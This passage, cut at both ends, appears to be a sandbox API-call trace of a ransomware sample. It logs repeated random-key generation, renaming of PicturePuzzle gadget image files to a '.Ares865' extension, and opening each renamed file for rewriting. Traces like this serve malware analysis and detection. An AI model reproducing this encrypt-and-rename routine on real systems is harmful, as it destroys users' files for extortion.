pbBuffer=0x2ccce18) returned 1 [0118.184] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png.Ares865") returned 104 [0118.184] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_left.png.ares865"), dwFlags=0x1) returned 1 [0118.186] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0118.186] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.187] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.187] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.190] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.190] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.191] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png.Ares865") returned 105 [0118.191] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_right.png.ares865"), dwFlags=0x1) returned 1 [0118.193] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.193] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0118.193] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.194] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.194] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.197] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.197] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.197] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.198] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png.Ares865") returned 103 [0118.198] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_top.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_top.png.ares865"), dwFlags=0x1) returned 1 [0118.200] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_top.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.200] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0118.200] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.201] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.201] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.203] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.204] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.204] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.205] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png.Ares865") returned 114 [0118.205] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_left.png.ares865"), dwFlags=0x1) returned 1 [0118.206] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.206] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=168) returned 1 [0118.207] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.207] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.207] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.210] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.211] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.211] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.211] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png.Ares865") returned 115 [0118.211] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_right.png.ares865"), dwFlags=0x1) returned 1 [0118.213] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.213] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=165) returned 1 [0118.213] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.214] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.214] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.217] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.217] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.217] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png.Ares865") returned 111 [0118.218] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_left.png.ares865"), dwFlags=0x1) returned 1 [0118.220] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.220] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=166) returned 1 [0118.220] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.221] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.221] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.223] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.224] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.224] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.225] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png.Ares865") returned 112 [0118.225] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_right.png.ares865"), dwFlags=0x1) returned 1 [0118.228] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.228] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=168) returned 1 [0118.228] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.229] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.229] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.231] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.232] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.232] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.232] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png.Ares865") returned 103 [0118.233] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider.png.ares865"), dwFlags=0x1) returned 1 [0118.234] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.235] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131) returned 1 [0118.235] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.236] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.236] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.238] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.239] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.239] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.239] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png.Ares865") returned 108 [0118.240] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_left.png.ares865"), dwFlags=0x1) returned 1 [0118.241] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0118.242] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.242] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.242] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.245] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.246] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.246] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.246] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png.Ares865") returned 109 [0118.246] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_right.png.ares865"), dwFlags=0x1) returned 1 [0118.248] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.248] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139) returned 1 [0118.248] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.249] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.249] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.253] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.254] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.254] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.254] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png.Ares865") returned 109 [0118.254] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_disabled.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_disabled.png.ares865"), dwFlags=0x1) returned 1 [0118.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_disabled.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.256] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=697) returned 1 [0118.257] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.257] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.257] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.260] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.261] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.261] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.261] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png.Ares865") returned 106 [0118.261] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_hover.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_hover.png.ares865"), dwFlags=0x1) returned 1 [0118.263] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_hover.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.263] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1050) returned 1 [0118.263] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.264] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.264] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.267] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.268] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.268] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.268] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png.Ares865") returned 108 [0118.268] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_pressed.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_pressed.png.ares865"), dwFlags=0x1) returned 1 [0118.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_pressed.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.271] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1124) returned 1 [0118.271] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.271] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.271] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.274] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.275] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, 